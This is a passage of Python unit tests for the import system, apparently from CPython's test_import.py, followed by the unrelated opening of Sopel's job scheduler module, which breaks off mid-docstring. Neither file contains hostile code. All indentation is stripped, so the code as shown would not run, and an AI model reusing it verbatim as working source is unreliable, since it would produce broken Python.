with test.support.start_threads(threads, event.set):
time.sleep(0)
finally:
sys.modules.pop('package', None)
sys.modules.pop('package.submodule', None)
if exc is not None:
raise exc
finally:
del sys.path[0]
@unittest.skipUnless(sys.platform == "win32", "Windows-specific")
def test_dll_dependency_import(self):
from _winapi import GetModuleFileName
dllname = GetModuleFileName(sys.dllhandle)
pydname = importlib.util.find_spec("_sqlite3").origin
depname = os.path.join(
os.path.dirname(pydname),
"sqlite3{}.dll".format("_d" if "_d" in pydname else ""))
with test.support.temp_dir() as tmp:
tmp2 = os.path.join(tmp, "DLLs")
os.mkdir(tmp2)
pyexe = os.path.join(tmp, os.path.basename(sys.executable))
shutil.copy(sys.executable, pyexe)
shutil.copy(dllname, tmp)
for f in glob.glob(os.path.join(sys.prefix, "vcruntime*.dll")):
shutil.copy(f, tmp)
shutil.copy(pydname, tmp2)
env = None
env = {k.upper(): os.environ[k] for k in os.environ}
env["PYTHONPATH"] = tmp2 + ";" + os.path.dirname(os.__file__)
# Test 1: import with added DLL directory
subprocess.check_call([
pyexe, "-Sc", ";".join([
"import os",
"p = os.add_dll_directory({!r})".format(
os.path.dirname(depname)),
"import _sqlite3",
"p.close"
])],
stderr=subprocess.STDOUT,
env=env,
cwd=os.path.dirname(pyexe))
# Test 2: import with DLL adjacent to PYD
shutil.copy(depname, tmp2)
subprocess.check_call([pyexe, "-Sc", "import _sqlite3"],
stderr=subprocess.STDOUT,
env=env,
cwd=os.path.dirname(pyexe))
@skip_if_dont_write_bytecode
class FilePermissionTests(unittest.TestCase):
# tests for file mode on cached .pyc files
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_creation_mode(self):
mask = 0o022
with temp_umask(mask), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
module = __import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
# Check that the umask is respected, and the executable bits
# aren't set.
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)),
oct(0o666 & ~mask))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_mode_issue_2051(self):
# permissions of .pyc should match those of .py, regardless of mask
mode = 0o600
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(mode))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_readonly(self):
mode = 0o400
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
expected = mode | 0o200 # Account for fix for issue #6074
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(expected))
def test_pyc_always_writable(self):
# Initially read-only .pyc files on Windows used to cause problems
# with later updates, see issue #6074 for details
with _ready_to_import() as (name, path):
# Write a Python file, make it read-only and import it
with open(path, 'w') as f:
f.write("x = 'original'\n")
# Tweak the mtime of the source to ensure pyc gets updated later
s = os.stat(path)
os.utime(path, (s.st_atime, s.st_mtime-100000000))
os.chmod(path, 0o400)
m = __import__(name)
self.assertEqual(m.x, 'original')
# Change the file and then reimport it
os.chmod(path, 0o600)
with open(path, 'w') as f:
f.write("x = 'rewritten'\n")
unload(name)
importlib.invalidate_caches()
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
# Now delete the source file and check the pyc was rewritten
unlink(path)
unload(name)
importlib.invalidate_caches()
bytecode_only = path + "c"
os.rename(importlib.util.cache_from_source(path), bytecode_only)
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
class PycRewritingTests(unittest.TestCase):
# Test that the `co_filename` attribute on code objects always points
# to the right file, even when various things happen (e.g. both the .py
# and the .pyc file are renamed).
module_name = "unlikely_module_name"
module_source = """
import sys
code_filename = sys._getframe().f_code.co_filename
module_filename = __file__
constant = 1
def func():
pass
func_filename = func.__code__.co_filename
"""
dir_name = os.path.abspath(TESTFN)
file_name = os.path.join(dir_name, module_name) + os.extsep + "py"
compiled_name = importlib.util.cache_from_source(file_name)
def setUp(self):
self.sys_path = sys.path[:]
self.orig_module = sys.modules.pop(self.module_name, None)
os.mkdir(self.dir_name)
with open(self.file_name, "w") as f:
f.write(self.module_source)
sys.path.insert(0, self.dir_name)
importlib.invalidate_caches()
def tearDown(self):
sys.path[:] = self.sys_path
if self.orig_module is not None:
sys.modules[self.module_name] = self.orig_module
else:
unload(self.module_name)
unlink(self.file_name)
unlink(self.compiled_name)
rmtree(self.dir_name)
def import_module(self):
ns = globals()
__import__(self.module_name, ns, ns)
return sys.modules[self.module_name]
def test_basics(self):
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
del sys.modules[self.module_name]
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_incorrect_code_name(self):
py_compile.compile(self.file_name, dfile="another_module.py")
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_module_without_source(self):
target = "another_module.py"
py_compile.compile(self.file_name, dfile=target)
os.remove(self.file_name)
pyc_file = make_legacy_pyc(self.file_name)
importlib.invalidate_caches()
mod = self.import_module()
self.assertEqual(mod.module_filename, pyc_file)
self.assertEqual(mod.code_filename, target)
self.assertEqual(mod.func_filename, target)
def test_foreign_code(self):
py_compile.compile(self.file_name)
with open(self.compiled_name, "rb") as f:
header = f.read(16)
code = marshal.load(f)
constants = list(code.co_consts)
foreign_code = importlib.import_module.__code__
pos = constants.index(1)
constants[pos] = foreign_code
code = code.replace(co_consts=tuple(constants))
with open(self.compiled_name, "wb") as f:
f.write(header)
marshal.dump(code, f)
mod = self.import_module()
self.assertEqual(mod.constant.co_filename, foreign_code.co_filename)
class PathsTests(unittest.TestCase):
SAMPLES = ('test', 'test\u00e4\u00f6\u00fc\u00df', 'test\u00e9\u00e8',
'test\u00b0\u00b3\u00b2')
path = TESTFN
def setUp(self):
os.mkdir(self.path)
self.syspath = sys.path[:]
def tearDown(self):
rmtree(self.path)
sys.path[:] = self.syspath
# Regression test for http://bugs.python.org/issue1293.
def test_trailing_slash(self):
with open(os.path.join(self.path, 'test_trailing_slash.py'), 'w') as f:
f.write("testdata = 'test_trailing_slash'")
sys.path.append(self.path+'/')
mod = __import__("test_trailing_slash")
self.assertEqual(mod.testdata, 'test_trailing_slash')
unload("test_trailing_slash")
# Regression test for http://bugs.python.org/issue3677.
@unittest.skipUnless(sys.platform == 'win32', 'Windows-specific')
def test_UNC_path(self):
with open(os.path.join(self.path, 'test_unc_path.py'), 'w') as f:
f.write("testdata = 'test_unc_path'")
importlib.invalidate_caches()
# Create the UNC path, like \\myhost\c$\foo\bar.
path = os.path.abspath(self.path)
import socket
hn = socket.gethostname()
drive = path[0]
unc = "\\\\%s\\%s$"%(hn, drive)
unc += path[2:]
try:
os.listdir(unc)
except OSError as e:
if e.errno in (errno.EPERM, errno.EACCES, errno.ENOENT):
# See issue #15338
self.skipTest("cannot access administrative share %r" % (unc,))
raise
sys.path.insert(0, unc)
try:
mod = __import__("test_unc_path")
except ImportError as e:
self.fail("could not import 'test_unc_path' from %r: %r"
% (unc, e))
self.assertEqual(mod.testdata, 'test_unc_path')
self.assertTrue(mod.__file__.startswith(unc), mod.__file__)
unload("test_unc_path")
class RelativeImportTests(unittest.TestCase):
def tearDown(self):
unload("test.relimport")
setUp = tearDown
def test_relimport_star(self):
# This will import * from .test_import.
from .. import relimport
self.assertTrue(hasattr(relimport, "RelativeImportTests"))
def test_issue3221(self):
# Note for mergers: the 'absolute' tests from the 2.x branch
# are missing in Py3k because implicit relative imports are
# a thing of the past
#
# Regression test for http://bugs.python.org/issue3221.
def check_relative():
exec("from . import relimport", ns)
# Check relative import OK with __package__ and __name__ correct
ns = dict(__package__='test', __name__='test.notarealmodule')
check_relative()
# Check relative import OK with only __name__ wrong
ns = dict(__package__='test', __name__='notarealpkg.notarealmodule')
check_relative()
# Check relative import fails with only __package__ wrong
ns = dict(__package__='foo', __name__='test.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with __package__ and __name__ wrong
ns = dict(__package__='foo', __name__='notarealpkg.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with package set to a non-string
ns = dict(__package__=object())
self.assertRaises(TypeError, check_relative)
def test_absolute_import_without_future(self):
# If explicit relative import syntax is used, then do not try
# to perform an absolute import in the face of failure.
# Issue #7902.
with self.assertRaises(ImportError):
from .os import sep
self.fail("explicit relative import triggered an "
"implicit absolute import")
def test_import_from_non_package(self):
path = os.path.join(os.path.dirname(__file__), 'data', 'package2')
with uncache('submodule1', 'submodule2'), DirsOnSysPath(path):
with self.assertRaises(ImportError):
import submodule1
self.assertNotIn('submodule1', sys.modules)
self.assertNotIn('submodule2', sys.modules)
def test_import_from_unloaded_package(self):
with uncache('package2', 'package2.submodule1', 'package2.submodule2'), \
DirsOnSysPath(os.path.join(os.path.dirname(__file__), 'data')):
import package2.submodule1
package2.submodule1.submodule2
class OverridingImportBuiltinTests(unittest.TestCase):
def test_override_builtin(self):
# Test that overriding builtins.__import__ can bypass sys.modules.
import os
def foo():
import os
return os
self.assertEqual(foo(), os) # Quick sanity check.
with swap_attr(builtins, "__import__", lambda *x: 5):
self.assertEqual(foo(), 5)
# Test what happens when we shadow __import__ in globals(); this
# currently does not impact the import process, but if this changes,
# other code will need to change, so keep this test as a tripwire.
with swap_item(globals(), "__import__", lambda *x: 5):
self.assertEqual(foo(), os)
class PycacheTests(unittest.TestCase):
# Test the various PEP 3147/488-related behaviors.
def _clean(self):
forget(TESTFN)
rmtree('__pycache__')
unlink(self.source)
def setUp(self):
self.source = TESTFN + '.py'
self._clean()
with open(self.source, 'w') as fp:
print('# This is a test file written by test_import.py', file=fp)
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
def tearDown(self):
assert sys.path[0] == os.curdir, 'Unexpected sys.path[0]'
del sys.path[0]
self._clean()
@skip_if_dont_write_bytecode
def test_import_pyc_path(self):
self.assertFalse(os.path.exists('__pycache__'))
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} does not '
'exist'.format(pyc_path, TESTFN))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
@unittest.skipIf(hasattr(os, 'geteuid') and os.geteuid() == 0,
"due to varying filesystem permission semantics (issue #11956)")
@skip_if_dont_write_bytecode
def test_unwritable_directory(self):
# When the umask causes the new __pycache__ directory to be
# unwritable, the import still succeeds but no .pyc file is written.
with temp_umask(0o222):
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertFalse(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} '
'exists'.format(pyc_path, TESTFN))
@skip_if_dont_write_bytecode
def test_missing_source(self):
# With PEP 3147 cache layout, removing the source but leaving the pyc
# file does not satisfy the import.
__import__(TESTFN)
pyc_file = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_file))
os.remove(self.source)
forget(TESTFN)
importlib.invalidate_caches()
self.assertRaises(ImportError, __import__, TESTFN)
@skip_if_dont_write_bytecode
def test_missing_source_legacy(self):
# Like test_missing_source() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __file__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
try:
self.assertEqual(m.__file__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
finally:
os.remove(pyc_file)
def test___cached__(self):
# Modules now also have an __cached__ that points to the pyc file.
m = __import__(TESTFN)
pyc_file = importlib.util.cache_from_source(TESTFN + '.py')
self.assertEqual(m.__cached__, os.path.join(os.curdir, pyc_file))
@skip_if_dont_write_bytecode
def test___cached___legacy_pyc(self):
# Like test___cached__() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __cached__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
self.assertEqual(m.__cached__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
@skip_if_dont_write_bytecode
def test_package___cached__(self):
# Like test___cached__ but for packages.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_package___cached___from_pyc(self):
# Like test___cached__ but ensuring __cached__ when imported from a
# PEP 3147 pyc file.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
unload('pep3147.foo')
unload('pep3147')
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_recompute_pyc_same_second(self):
# Even when the source file doesn't change timestamp, a change in
# source size is enough to trigger recomputation of the pyc file.
__import__(TESTFN)
unload(TESTFN)
with open(self.source, 'a') as fp:
print("x = 5", file=fp)
m = __import__(TESTFN)
self.assertEqual(m.x, 5)
class TestSymbolicallyLinkedPackage(unittest.TestCase):
package_name = 'sample'
tagged = package_name + '-tagged'
def setUp(self):
test.support.rmtree(self.tagged)
test.support.rmtree(self.package_name)
self.orig_sys_path = sys.path[:]
# create a sample package; imagine you have a package with a tag and
# you want to symbolically link it from its untagged name.
os.mkdir(self.tagged)
self.addCleanup(test.support.rmtree, self.tagged)
init_file = os.path.join(self.tagged, '__init__.py')
test.support.create_empty_file(init_file)
assert os.path.exists(init_file)
# now create a symlink to the tagged package
# sample -> sample-tagged
os.symlink(self.tagged, self.package_name, target_is_directory=True)
self.addCleanup(test.support.unlink, self.package_name)
importlib.invalidate_caches()
self.assertEqual(os.path.isdir(self.package_name), True)
assert os.path.isfile(os.path.join(self.package_name, '__init__.py'))
def tearDown(self):
sys.path[:] = self.orig_sys_path
# regression test for issue6727
@unittest.skipUnless(
not hasattr(sys, 'getwindowsversion')
or sys.getwindowsversion() >= (6, 0),
"Windows Vista or later required")
@test.support.skip_unless_symlink
def test_symlinked_dir_importable(self):
# make sure sample can only be imported from the current directory.
sys.path[:] = ['.']
assert os.path.exists(self.package_name)
assert os.path.exists(os.path.join(self.package_name, '__init__.py'))
# Try to import the package
importlib.import_module(self.package_name)
@cpython_only
class ImportlibBootstrapTests(unittest.TestCase):
# These tests check that importlib is bootstrapped.
def test_frozen_importlib(self):
mod = sys.modules['_frozen_importlib']
self.assertTrue(mod)
def test_frozen_importlib_is_bootstrap(self):
from importlib import _bootstrap
mod = sys.modules['_frozen_importlib']
self.assertIs(mod, _bootstrap)
self.assertEqual(mod.__name__, 'importlib._bootstrap')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap.py'), mod.__file__)
def test_frozen_importlib_external_is_bootstrap_external(self):
from importlib import _bootstrap_external
mod = sys.modules['_frozen_importlib_external']
self.assertIs(mod, _bootstrap_external)
self.assertEqual(mod.__name__, 'importlib._bootstrap_external')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap_external.py'), mod.__file__)
def test_there_can_be_only_one(self):
# Issue #15386 revealed a tricky loophole in the bootstrapping
# This test is technically redundant, since the bug caused importing
# this test module to crash completely, but it helps prove the point
from importlib import machinery
mod = sys.modules['_frozen_importlib']
self.assertIs(machinery.ModuleSpec, mod.ModuleSpec)
@cpython_only
class GetSourcefileTests(unittest.TestCase):
"""Test importlib._bootstrap_external._get_sourcefile() as used by the C API.
    Because of the peculiar way this function is needed, the tests are
    deliberately whitebox tests.
"""
def test_get_sourcefile(self):
# Given a valid bytecode path, return the path to the corresponding
# source file if it exists.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
            _path_isfile.return_value = True
path = TESTFN + '.pyc'
expect = TESTFN + '.py'
self.assertEqual(_get_sourcefile(path), expect)
def test_get_sourcefile_no_source(self):
# Given a valid bytecode path without a corresponding source path,
# return the original bytecode path.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
            _path_isfile.return_value = False
path = TESTFN + '.pyc'
self.assertEqual(_get_sourcefile(path), path)
def test_get_sourcefile_bad_ext(self):
# Given a path with an invalid bytecode extension, return the
# bytecode path passed as the argument.
path = TESTFN + '.bad_ext'
self.assertEqual(_get_sourcefile(path), path)
class ImportTracebackTests(unittest.TestCase):
def setUp(self):
os.mkdir(TESTFN)
self.old_path = sys.path[:]
sys.path.insert(0, TESTFN)
def tearDown(self):
sys.path[:] = self.old_path
rmtree(TESTFN)
def create_module(self, mod, contents, ext=".py"):
fname = os.path.join(TESTFN, mod + ext)
with open(fname, "w") as f:
f.write(contents)
self.addCleanup(unload, mod)
importlib.invalidate_caches()
return fname
def assert_traceback(self, tb, files):
deduped_files = []
while tb:
code = tb.tb_frame.f_code
fn = code.co_filename
if not deduped_files or fn != deduped_files[-1]:
deduped_files.append(fn)
tb = tb.tb_next
self.assertEqual(len(deduped_files), len(files), deduped_files)
for fn, pat in zip(deduped_files, files):
self.assertIn(pat, fn)
def test_nonexistent_module(self):
try:
# assertRaises() clears __traceback__
import nonexistent_xyzzy
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__])
def test_nonexistent_module_nested(self):
self.create_module("foo", "import nonexistent_xyzzy")
try:
import foo
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure(self):
self.create_module("foo", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure_nested(self):
self.create_module("foo", "import bar")
self.create_module("bar", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py', 'bar.py'])
# A few more examples from issue #15425
def test_syntax_error(self):
self.create_module("foo", "invalid syntax is invalid")
try:
import foo
except SyntaxError as e:
tb = e.__traceback__
else:
self.fail("SyntaxError should have been raised")
self.assert_traceback(tb, [__file__])
def _setup_broken_package(self, parent, child):
pkg_name = "_parent_foo"
self.addCleanup(unload, pkg_name)
pkg_path = os.path.join(TESTFN, pkg_name)
os.mkdir(pkg_path)
# Touch the __init__.py
init_path = os.path.join(pkg_path, '__init__.py')
with open(init_path, 'w') as f:
f.write(parent)
bar_path = os.path.join(pkg_path, 'bar.py')
with open(bar_path, 'w') as f:
f.write(child)
importlib.invalidate_caches()
return init_path, bar_path
def test_broken_submodule(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_from(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_parent(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
def test_broken_parent_from(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
@cpython_only
def test_import_bug(self):
# We simulate a bug in importlib and check that it's not stripped
# away from the traceback.
self.create_module("foo", "")
importlib = sys.modules['_frozen_importlib_external']
if 'load_module' in vars(importlib.SourceLoader):
old_exec_module = importlib.SourceLoader.exec_module
else:
old_exec_module = None
try:
def exec_module(*args):
1/0
importlib.SourceLoader.exec_module = exec_module
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, '<frozen importlib', __file__])
finally:
if old_exec_module is None:
del importlib.SourceLoader.exec_module
else:
importlib.SourceLoader.exec_module = old_exec_module
@unittest.skipUnless(TESTFN_UNENCODABLE, 'need TESTFN_UNENCODABLE')
def test_unencodable_filename(self):
# Issue #11619: The Python parser and the import machinery must not
# encode filenames, especially on Windows
pyname = script_helper.make_script('', TESTFN_UNENCODABLE, 'pass')
self.addCleanup(unlink, pyname)
name = pyname[:-3]
script_helper.assert_python_ok("-c", "mod = __import__(%a)" % name,
__isolated=False)
class CircularImportTests(unittest.TestCase):
"""See the docstrings of the modules being imported for the purpose of the
test."""
def tearDown(self):
"""Make sure no modules pre-exist in sys.modules which are being used to
test."""
for key in list(sys.modules.keys()):
if key.startswith('test.test_import.data.circular_imports'):
del sys.modules[key]
def test_direct(self):
try:
import test.test_import.data.circular_imports.basic
except ImportError:
self.fail('circular import through relative imports failed')
def test_indirect(self):
try:
import test.test_import.data.circular_imports.indirect
except ImportError:
self.fail('relative import in module contributing to circular '
'import failed')
def test_subpackage(self):
try:
import test.test_import.data.circular_imports.subpackage
except ImportError:
self.fail('circular import involving a subpackage failed')
def test_rebinding(self):
try:
import test.test_import.data.circular_imports.rebinding as rebinding
except ImportError:
self.fail('circular import with rebinding of module attribute failed')
from test.test_import.data.circular_imports.subpkg import util
self.assertIs(util.util, rebinding.util)
def test_binding(self):
try:
import test.test_import.data.circular_imports.binding
except ImportError:
self.fail('circular import with binding a submodule to a name failed')
def test_crossreference1(self):
import test.test_import.data.circular_imports.use
import test.test_import.data.circular_imports.source
def test_crossreference2(self):
with self.assertRaises(AttributeError) as cm:
import test.test_import.data.circular_imports.source
errmsg = str(cm.exception)
self.assertIn('test.test_import.data.circular_imports.source', errmsg)
self.assertIn('spam', errmsg)
self.assertIn('partially initialized module', errmsg)
self.assertIn('circular import', errmsg)
if __name__ == '__main__':
# Test needs to be a package, so we can do relative imports.
unittest.main()
|
jobs.py
|
"""Sopel's Job Scheduler: internal tool for job management.
.. important::
As of Sopel 5.3, this is an internal tool used by Sopel to manage internal
jobs and should not be used by plugin authors. Its usage and documentation
    are for Sopel core development and advanced developers. It is subject to
rapid changes between versions without much (or any) warning.
"""
# Copyright 2019, Florian Strzelecki <florian.strzelecki@gmail.com>
#
# Licensed under the Eiffel Forum License 2.
from __future__ import annotations
import inspect
import logging
import threading
import time
LOGGER = logging.getLogger(__name__)
class Scheduler(threading.Thread):
"""Generic Job Scheduler.
:param object manager: manager passed to jobs as argument
Scheduler is a :class:`thread <threading.Thread>` that keeps track of
:class:`Jobs <Job>` and periodically checks which ones are ready to
execute. When ready, their :meth:`~Job.execute` method is called, either
in a separate thread or in the scheduler's thread (it depends on the
job's :meth:`~Job.is_threaded` method).
It can be started as any other thread::
# on bot's startup
scheduler = jobs.Scheduler(bot)
scheduler.start() # run the thread forever
Then it runs forever until the :meth:`stop` method is called, usually when
the bot shuts down.
.. note::
Thread safety is ensured with threading's :class:`~threading.Lock`
and :class:`~threading.Event` when:
* a job is :meth:`registered <register>` or
:meth:`removed <remove_callable_job>`
* the scheduler is :meth:`cleared <clear_jobs>` or
:meth:`stopped <stop>`
* the scheduler gets jobs that are ready for execution
These actions can be performed while the scheduler is running.
.. important::
This is an internal tool used by Sopel to manage internal jobs and
        should not be used by plugin authors. Its usage and documentation are
for Sopel core development and advanced developers. It is subject to
rapid changes between versions without much (or any) warning.
"""
def __init__(self, manager):
threading.Thread.__init__(self)
self.manager = manager
"""Job manager, used as argument for jobs."""
self.stopping = threading.Event()
"""Stopping flag. See :meth:`stop`."""
self._jobs = []
self._mutex = threading.Lock()
def register(self, job):
"""Register a Job to the current job queue.
:param job: job to register
:type job: :class:`sopel.tools.jobs.Job`
This method is thread safe.
"""
with self._mutex:
self._jobs.append(job)
LOGGER.debug('Job registered: %s', str(job))
def clear_jobs(self):
"""Clear current Job queue and start fresh.
This method is thread safe. However, it won't cancel or stop any
currently running jobs.
"""
with self._mutex:
self._jobs = []
def stop(self):
"""Ask the job scheduler to stop.
The scheduler thread will stop its loop over jobs to process, but it
won't join the thread, or clear its queue—this has to be done
separately by the calling thread::
scheduler.stop() # ask the scheduler to stop
scheduler.join() # wait for the scheduler to actually stop
Note that this won't cancel or stop any currently running jobs.
"""
self.stopping.set()
def remove_callable_job(self, callable):
"""Remove ``callable`` from the job queue.
        :param callable: the callable to remove
:type callable: :term:`function`
This method is thread safe. However, it won't cancel or stop any
currently running jobs.
"""
with self._mutex:
self._jobs = [
job for job in self._jobs
if job._handler != callable
]
def run(self):
"""Run forever until :meth:`stop` is called.
This method waits at most a second between each iteration. At each step
it retrieves the jobs that are ready for execution, and executes them.
See the :meth:`Job.execute` method for more information.
Internally, it loops forever until its :attr:`stopping` event is set.
.. note::
This should not be called directly, as it will be done by the
:meth:`threading.Thread.start` method.
"""
while not self.stopping.is_set():
try:
now = time.time()
# Collect ready jobs by now
for job in self._get_ready_jobs(now):
self._run_job(job)
# Wait up to a second
time_spent = time.time() - now
wait_time = max(0, 1 - time_spent)
if wait_time:
time.sleep(wait_time)
except KeyboardInterrupt:
# Do not block on KeyboardInterrupt
LOGGER.debug('Job scheduler stopped by KeyboardInterrupt')
raise
except Exception as error: # TODO: Be specific
LOGGER.error('Error in job scheduler: %s', error)
# Plugins exceptions are caught earlier, so this is a bit
# more serious. Options are to either stop the main thread
# or continue this thread and hope that it won't happen
# again.
self.manager.on_scheduler_error(self, error)
# Sleep a bit to guard against busy-looping and filling
# the log with useless error messages.
time.sleep(10.0) # seconds
def _get_ready_jobs(self, now):
with self._mutex:
jobs = [job for job in self._jobs if job.is_ready_to_run(now)]
return jobs
def _run_job(self, job):
if job.is_threaded():
# make sure the job knows it's running, even though the thread
# isn't started yet.
job.is_running.set()
t = threading.Thread(
target=self._call, args=(job,)
)
t.start()
else:
self._call(job)
def _call(self, job):
"""Wrap the job's execution to handle its state and errors."""
try:
with job:
job.execute(self.manager)
except Exception as error: # TODO: Be specific
LOGGER.error('Error while processing job: %s', error)
self.manager.on_job_error(self, job, error)
class Job:
"""Holds information about when a function should be called next.
:param intervals: set of intervals; each is a number of seconds between
calls to ``handler``
:type intervals: :term:`iterable`
:param str plugin: optional plugin name to which the job belongs
:param str label: optional label (name) for the job
:param handler: function to be called when the job is ready to execute
:type handler: :term:`function`
:param str doc: optional documentation for the job
Job is a simple structure that holds information about when a function
should be called next. They are best used with a :class:`Scheduler`
that will manage job execution when they are ready.
The :term:`function` to execute is the ``handler``, which must be a
callable with this signature::
def handler(manager):
# perform action periodically
# return is optional
The ``manager`` parameter can be any kind of object; usually it's an
instance of :class:`sopel.bot.Sopel`.
When a job is ready, you can execute it by calling its :meth:`execute`
method (providing the appropriate ``manager`` argument)::
if job.is_ready_to_run(time.time()):
job.execute(manager) # marked as running
# "next times" have been updated; the job is not running
In that case, ``execute`` takes care of the running state of the job.
Alternatively, you can use a ``with`` statement to perform action before
and/or after executing the job; in that case, the ``with`` statement takes
precedence, and the :meth:`execute` method won't interfere::
with job:
# the job is now running, you can perform pre-execute action
job.execute() # execute the job's action, no state modification
# the job is still marked as "running"
# you can perform post-execute action
# outside of the with statement, the job is not running anymore
.. seealso::
The :class:`sopel.plugins.jobs.Scheduler` class is specifically
designed for plugins' jobs, expecting an instance of
:class:`sopel.bot.Sopel` as a manager, and should be used to manipulate
plugin jobs.
        In all other cases, the :class:`sopel.tools.jobs.Scheduler` class is a
generic job scheduler.
"""
@classmethod
def kwargs_from_callable(cls, handler):
"""Generate the keyword arguments to create a new instance.
:param handler: callable used to generate keyword arguments
:type handler: :term:`function`
:return: a map of keyword arguments
:rtype: dict
This classmethod takes the ``handler``'s attributes to generate a map
of keyword arguments for the class. This can be used by the
:meth:`from_callable` classmethod to instantiate a new rule object.
